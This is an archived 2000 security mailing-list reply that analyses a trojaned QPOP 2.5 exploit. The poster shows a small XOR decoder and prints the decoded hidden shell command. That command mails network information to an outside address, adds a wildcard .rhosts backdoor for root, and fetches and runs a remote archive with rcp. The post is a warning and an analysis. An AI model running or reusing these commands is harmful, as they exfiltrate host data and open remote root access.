Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: QPOP2.5* exploit ??

From: typo () INFERNO TUSCULUM EDU (typo () INFERNO TUSCULUM EDU)
Date: Sun, 14 May 2000 23:18:57 +0200

On Sun, May 14, 2000 at 12:30:03PM -0500, Ryan Sweat wrote:

     this has been found in the wild, however there seems to be a trojan
in the shellcode.  Popper 2.5* has been thought to be safe.
I would not reccomend running this on your own machine unless you crack
the shellcode and see what it does.


trojan is XOR encoded and decodes itself. i was unable to obtain
a copy of solwar.tar. tar returns warnings when solwar.tar can't be
retrieved. shellcode seems to be generated by stealth's hellkit
(available from http://teso.scene.at).

enemy:~# tail -2 as.c; gcc as.c -o as; ./as
main() { char *x; for (x=shellcode; x <= strlen(shellcode)+shellcode; x++)
        printf("%c", *x ^ 2); printf("\n"); }
.../bin/sh-c../sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null; echo '+ +' >> ~root/.rhosts; rcp 
lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar; tar -xvf solwar* >> /dev/null; cd solwar; chmod +x 
solwar.sh; ./solwar.sh >> /dev/null; cd ..; rm -rf solwar...

--
so much entropy, so little time
Previous By Date Next
Previous By Thread Next

Current thread: